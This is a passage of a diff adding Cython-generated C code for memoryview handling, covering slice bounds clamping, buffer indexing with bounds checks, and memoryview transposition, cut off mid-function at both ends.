+ * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + __pyx_t_2 = (__pyx_v_start >= __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + if (__pyx_v_negative_step) { + + /* "View.MemoryView":837 + * elif start >= shape: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = shape + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":839 + * start = shape - 1 + * else: + * start = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + /*else*/ { + __pyx_v_start = __pyx_v_shape; + } + __pyx_L11:; + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + } + __pyx_L9:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + goto __pyx_L8; + } + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":842 + * else: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = 0 + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L12; + } + + /* "View.MemoryView":844 + * start = shape - 1 + * else: + * start = 0 # <<<<<<<<<<<<<< + * + * if have_stop: + */ + /*else*/ { + __pyx_v_start = 0; + } + __pyx_L12:; + } + __pyx_L8:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + __pyx_t_2 = (__pyx_v_have_stop != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":848 + * if have_stop: + * if stop < 0: + * stop += shape # <<<<<<<<<<<<<< + * if stop < 0: + * stop = 0 + */ + __pyx_v_stop = (__pyx_v_stop + __pyx_v_shape); + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":850 + * stop += shape + * if stop < 0: + * stop = 0 # <<<<<<<<<<<<<< + * elif stop > shape: + * stop = shape + */ + __pyx_v_stop = 0; + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + } + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + goto __pyx_L14; + } + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + __pyx_t_2 = (__pyx_v_stop > __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":852 + * stop = 0 + * elif stop > shape: + * stop = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + __pyx_v_stop = __pyx_v_shape; + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + } + __pyx_L14:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + goto __pyx_L13; + } + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":855 + * else: + * if negative_step: + * stop = -1 # <<<<<<<<<<<<<< + * else: + * stop = shape + */ + __pyx_v_stop = -1L; + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + goto __pyx_L16; + } + + /* "View.MemoryView":857 + * stop = -1 + * else: + * stop = shape # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_v_stop = __pyx_v_shape; + } + __pyx_L16:; + } + __pyx_L13:; + + /* "View.MemoryView":861 + * + * with cython.cdivision(True): + * new_shape = (stop - start) // step # <<<<<<<<<<<<<< + * + * if (stop - start) - step * new_shape: + */ + __pyx_v_new_shape = ((__pyx_v_stop - __pyx_v_start) / __pyx_v_step); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + __pyx_t_2 = (((__pyx_v_stop - __pyx_v_start) - (__pyx_v_step * __pyx_v_new_shape)) != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":864 + * + * if (stop - start) - step * new_shape: + * new_shape += 1 # <<<<<<<<<<<<<< + * + * if new_shape < 0: + */ + __pyx_v_new_shape = (__pyx_v_new_shape + 1); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + } + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + __pyx_t_2 = (__pyx_v_new_shape < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":867 + * + * if new_shape < 0: + * new_shape = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_new_shape = 0; + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + } + + /* "View.MemoryView":870 + * + * + * dst.strides[new_ndim] = stride * step # <<<<<<<<<<<<<< + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset + */ + (__pyx_v_dst->strides[__pyx_v_new_ndim]) = (__pyx_v_stride * __pyx_v_step); + + /* "View.MemoryView":871 + * + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape # <<<<<<<<<<<<<< + * dst.suboffsets[new_ndim] = suboffset + * + */ + (__pyx_v_dst->shape[__pyx_v_new_ndim]) = __pyx_v_new_shape; + + /* "View.MemoryView":872 + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_dst->suboffsets[__pyx_v_new_ndim]) = __pyx_v_suboffset; + } + __pyx_L3:; + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + __pyx_t_2 = ((__pyx_v_suboffset_dim[0]) < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":876 + * + * if suboffset_dim[0] < 0: + * dst.data += start * stride # <<<<<<<<<<<<<< + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride + */ + __pyx_v_dst->data = (__pyx_v_dst->data + (__pyx_v_start * __pyx_v_stride)); + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + goto __pyx_L19; + } + + /* "View.MemoryView":878 + * dst.data += start * stride + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride # <<<<<<<<<<<<<< + * + * if suboffset >= 0: + */ + /*else*/ { + __pyx_t_3 = (__pyx_v_suboffset_dim[0]); + (__pyx_v_dst->suboffsets[__pyx_t_3]) = ((__pyx_v_dst->suboffsets[__pyx_t_3]) + (__pyx_v_start * __pyx_v_stride)); + } + __pyx_L19:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + __pyx_t_2 = (!__pyx_v_is_slice); + if (__pyx_t_2) { + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + __pyx_t_2 = (__pyx_v_new_ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":883 + * if not is_slice: + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset # <<<<<<<<<<<<<< + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + */ + __pyx_v_dst->data = ((((char **)__pyx_v_dst->data)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + goto __pyx_L22; + } + + /* "View.MemoryView":885 + * dst.data = ( dst.data)[0] + suboffset + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " # <<<<<<<<<<<<<< + * "must be indexed and not sliced", dim) + * else: + */ + /*else*/ { + + /* "View.MemoryView":886 + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + * "must be indexed and not sliced", dim) # <<<<<<<<<<<<<< + * else: + * suboffset_dim[0] = new_ndim + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 885, __pyx_L1_error) + } + __pyx_L22:; + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + goto __pyx_L21; + } + + /* "View.MemoryView":888 + * "must be indexed and not sliced", dim) + * else: + * suboffset_dim[0] = new_ndim # <<<<<<<<<<<<<< + * + * return 0 + */ + /*else*/ { + (__pyx_v_suboffset_dim[0]) = __pyx_v_new_ndim; + } + __pyx_L21:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + } + + /* "View.MemoryView":890 + * suboffset_dim[0] = new_ndim + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.slice_memviewslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + +static char *__pyx_pybuffer_index(Py_buffer *__pyx_v_view, char *__pyx_v_bufp, Py_ssize_t __pyx_v_index, Py_ssize_t __pyx_v_dim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_suboffset; + Py_ssize_t __pyx_v_itemsize; + char *__pyx_v_resultp; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_UCS4 __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("pybuffer_index", 0); + + /* "View.MemoryView":898 + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 # <<<<<<<<<<<<<< + * cdef Py_ssize_t itemsize = view.itemsize + * cdef char *resultp + */ + __pyx_v_suboffset = -1L; + + /* "View.MemoryView":899 + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + * cdef Py_ssize_t itemsize = view.itemsize # <<<<<<<<<<<<<< + * cdef char *resultp + * + */ + __pyx_t_1 = __pyx_v_view->itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + __pyx_t_2 = (__pyx_v_view->ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":903 + * + * if view.ndim == 0: + * shape = view.len // itemsize # <<<<<<<<<<<<<< + * stride = itemsize + * else: + */ + if (unlikely(__pyx_v_itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_view->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + __pyx_v_shape = __Pyx_div_Py_ssize_t(__pyx_v_view->len, __pyx_v_itemsize); + + /* "View.MemoryView":904 + * if view.ndim == 0: + * shape = view.len // itemsize + * stride = itemsize # <<<<<<<<<<<<<< + * else: + * shape = view.shape[dim] + */ + __pyx_v_stride = __pyx_v_itemsize; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + goto __pyx_L3; + } + + /* "View.MemoryView":906 + * stride = itemsize + * else: + * shape = view.shape[dim] # <<<<<<<<<<<<<< + * stride = view.strides[dim] + * if view.suboffsets != NULL: + */ + /*else*/ { + __pyx_v_shape = (__pyx_v_view->shape[__pyx_v_dim]); + + /* "View.MemoryView":907 + * else: + * shape = view.shape[dim] + * stride = view.strides[dim] # <<<<<<<<<<<<<< + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] + */ + __pyx_v_stride = (__pyx_v_view->strides[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + __pyx_t_2 = (__pyx_v_view->suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":909 + * stride = view.strides[dim] + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] # <<<<<<<<<<<<<< + * + * if index < 0: + */ + __pyx_v_suboffset = (__pyx_v_view->suboffsets[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + } + } + __pyx_L3:; + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":912 + * + * if index < 0: + * index += view.shape[dim] # <<<<<<<<<<<<<< + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + */ + __pyx_v_index = (__pyx_v_index + (__pyx_v_view->shape[__pyx_v_dim])); + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":914 + * index += view.shape[dim] + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * if index >= shape: + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_5 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_5); + __pyx_t_5 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__7); + __pyx_t_5 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_5, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(1, 914, __pyx_L1_error) + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + } + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index >= __pyx_v_shape); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":917 + * + * if index >= shape: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * resultp = bufp + index * stride + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_3 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__7); + __pyx_t_3 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_3, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(1, 917, __pyx_L1_error) + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":919 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * resultp = bufp + index * stride # <<<<<<<<<<<<<< + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset + */ + __pyx_v_resultp = (__pyx_v_bufp + (__pyx_v_index * __pyx_v_stride)); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":921 + * resultp = bufp + index * stride + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset # <<<<<<<<<<<<<< + * + * return resultp + */ + __pyx_v_resultp = ((((char **)__pyx_v_resultp)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + } + + /* "View.MemoryView":923 + * resultp = ( resultp)[0] + suboffset + * + * return resultp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_resultp; + goto __pyx_L0; + + /* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.pybuffer_index", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + +static int __pyx_memslice_transpose(__Pyx_memviewslice *__pyx_v_memslice) { + int __pyx_v_ndim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + int __pyx_v_i; + int __pyx_v_j; + int __pyx_r; + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + long __pyx_t_3; + long __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_ssize_t __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":930 + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: + * cdef int ndim = memslice.memview.view.ndim # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t *shape = memslice.shape + */ + __pyx_t_1 = __pyx_v_memslice->memview->view.ndim; + __pyx_v_ndim = __pyx_t_1; + + /* "View.MemoryView":932 + * cdef int ndim = memslice.memview.view.ndim + * + * cdef Py_ssize_t *shape = memslice.shape # <<<<<<<<<<<<<< + * cdef Py_ssize_t *strides = memslice.strides + * + */ + __pyx_t_2 = __pyx_v_memslice->shape; + __pyx_v_shape = __pyx_t_2; + + /* "View.MemoryView":933 + * + * cdef Py_ssize_t *shape = memslice.shape + * cdef Py_ssize_t *strides = memslice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_v_memslice->strides; + __pyx_v_strides = __pyx_t_2; + + /* "View.MemoryView":937 + * + * cdef int i, j + * for i in range(ndim // 2): # <<<<<<<<<<<<<< + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + */ + __pyx_t_3 = __Pyx_div_long(__pyx_v_ndim, 2); + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_1 = 0; __pyx_t_1 < __pyx_t_4; __pyx_t_1+=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":938 + * cdef int i, j + * for i in range(ndim // 2): + * j = ndim - 1 - i # <<<<<<<<<<<<<< + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] + */ + __pyx_v_j = ((__pyx_v_ndim - 1) - __pyx_v_i); + + /* "View.MemoryView":939 + * for i in range(ndim // 2): + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] # <<<<<<<<<<<<<< + * shape[i], shape[j] = shape[j], shape[i] + * + */ + __pyx_t_5 = (__pyx_v_strides[__pyx_v_j]); + __pyx_t_6 = (__pyx_v_strides[__pyx_v_i]); + (__pyx_v_strides[__pyx_v_i]) = __pyx_t_5; + (__pyx_v_strides[__pyx_v_j]) = __pyx_t_6; + + /* "View.MemoryView":940 + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] # <<<<<<<<<<<<<< + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + */ + __pyx_t_6 = (__pyx_v_shape[__pyx_v_j]); + __pyx_t_5 = (__pyx_v_shape[__pyx_v_i]); + (__pyx_v_shape[__pyx_v_i]) = __pyx_t_6; + (__pyx_v_shape[__pyx_v_j]) = __pyx_t_5; + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_i]) >= 0); + if (!__pyx_t_8) { + } else { + __pyx_t_7 = __pyx_t_8; + goto __pyx_L6_bool_binop_done; + } + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_j]) >= 0); + __pyx_t_7 = __pyx_t_8; + __pyx_L6_bool_binop_done:; + if (__pyx_t_7) { + + /* "View.MemoryView":943 + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_t_9 = __pyx_memoryview_err(PyExc_ValueError, __pyx_kp_s_Cannot_transpose_memoryview_with); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(1, 943, __pyx_L1_error) + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + } + } + + /* "View.MemoryView":945 + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.transpose_memslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + +/* Python wrapper */ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(((struct 